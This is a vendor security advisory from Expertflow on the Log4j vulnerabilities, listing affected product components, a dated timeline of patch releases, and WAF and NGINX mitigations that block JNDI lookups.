Log4J Vulnerability Assessment and Resolution - Expertflow Components

CVE-2021-44228

Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Expertflow products are deployed via a containerized solution using image hardening and following Docker CIS compliances as mentioned in Security and Compliance.

Following the recommendations highlighted in the blog Zero-Day Exploit Targeting Popular Java Library Log4J, this page covers assessments, business impact on Hybrid Chat, and status update on the actions being taken by the team for any suggestions, palliative measures, and the necessary patches.

Hybrid Chat

Customer Channel Manager in Hybrid Chat is vulnerable due to CVE-2021-44228. The Customer Channel Manager (CCM) is responsible for handling communication with all channels except WebChat. This vulnerability may impact all customer channels except WebChat.

Recommendation

If you are using a Web Application Firewall (WAF) behind Hybrid Chat, take the necessary actions to block external JNDI access. If you're using Cloudflare, take the suggested actions to block JNDI and LDAP access to avoid CVE-2021-44228. Consult your WAF vendor for a similar fix in your WAF.

If there is no WAF in place, all chat channels other than WebChat should be disabled until we announce a patch. There is no impact on WebChat, you can continue using WebChat services of Hybrid Chat.

Status

Date	Status
December 16, 8:00 PM (GMT+5)	Released 3.15.7 with an immediate fix for the Log4J vulnerability found in 3.15.x
December 16, 5:45 PM (GMT+5)	The patches for the following versions of Hybrid Chat are released: 3.18.1
December 15, 4:30 PM (GMT+5)	Patches are developed for the following versions of Hybrid Chat are currently under QA: 3.18.1 3.18.0 3.15.0 3.16.0 3.14.0
December 15 12:45 PM (GMT+5)	The team is working on: Testing build of NGINX nginx-njs-waf-cve2021-44228 for blocking LDAP calls Developing the patch of Channel Manager
December 14, 6 PM (GMT+5)	Log4J vulnerability detected in: Customer Channel Manager Communication Server Media Routing Engine (MRE)

It is recommended to the customers who are using the Hybrid Chat version older than 3.18.1 except 3.15.7 should apply this fix of Nginx that will block the remote code execution at the reverse proxy level.

App Suite

Following Log4J vulnerabilities in the App Suite components are identified.

Status

Date	Status
January 18, 2022	Released a patch of Wallboard with an immediate fix for the Log4J vulnerability CVE-2021-44228 found in 13.6.1. Check the Deployment Guide.

ECM

Sr. No.	Component Name	Vulnerability	Library
1.	ECM Services	^{CVE-2021-4104}	^log4j:log4j

PCS

	Component Name	Vulnerability	Library
1	TCD Connector	^{CVE-2021-4104}	^log4j:log4j
2	TCD Connector	^{CVE-2021-44228}	^{org.apache.logging.log4j:log4j-api}
3	TCD Connector	^{CVE-2021-44228}	^{org.apache.logging.log4j:log4j-core}
4	Report Exporter	^{CVE-2021-4104}	^log4j:log4j
5	SMPP Gateway	^{CVE-2021-4104}	^log4j:log4j
6	Email Notifications Service	^{CVE-2021-4104}	^log4j:log4j
7	PCS	^{CVE-2021-4104}	^log4j:log4j

As CVE-2021-4104 is detected in most of the PCS components. This vulnerability becomes critical only when log4j is configured for JMSAppender (JMSAppender is used to send log messages to JMS systems like ActiveMQ). No JMSAppenders are configured in PCS, so this vulnerability is not going to affect PCS.
For the CVE-2021-44228 in TCD Connector, this is relevant only for the clients who are running CCE and integrate with PCS for placing outbound dialer survey calls. An updated patch for this component will also be scheduled soon.

Wallboard

	Component Name	Vulnerability	Library
1	Synchronizer	^{CVE-2021-44228}	^{org.apache.logging.log4j:log4j-core}
2	Synchronizer	^{CVE-2021-44228}	^{org.apache.logging.log4j:log4j-api}

GC

Sr No.	Component Name	Vulnerability	File Name
1	Generic Connector	^{CVE-2019-17571}	^{org/apche/log4j/net/SocketNode.class}
2	Generic Connector	^{CVE-2021-44228}	^{org/apche/logging/log4j/core/net/JndiManager$1.class}
3	Generic Connector	^{CVE-2021-44228}	^{org/apche/logging/log4j/core/net/JndiManager$JndiManagerFactory.class}
4	Generic Connector	^{CVE-2021-44228}	^{org/apche/logging/log4j/core/net/JndiManager.class}
5	Generic Connector	^{CVE-2021-44228}	^{org/apche/logging/log4j/core/pattern/MessagePatternConverter.class}

No vulnerabilities related to remote code execution were found in any of the Supervisor Tools services.
For 4104 vulnerability found out in some of the ECM, PCS services as listed above, we'll plan a patch release and share the upgrade plan by Jan, next year.
For the Wallboard synchronizer, all customers using Expertflow's Dashboards&Wallboards App are safe or are less vulnerable if none of the Wallboard interfaces/ services are exposed on the public internet. However, we're still planning a fix in the latest version of Wallboard and will share an update soon with all customers. For upgrade, we'll need to plan an activity with each customer. Those who are using the oldest version of Wallboard (prior to 13.5.1) might not be eligible for the upgrade and will need a fresh deployment of the app.

We'll review the suggested fix in the lab on 15th December and update the plan for a quick fix at the customer site and the patch release plan if necessary.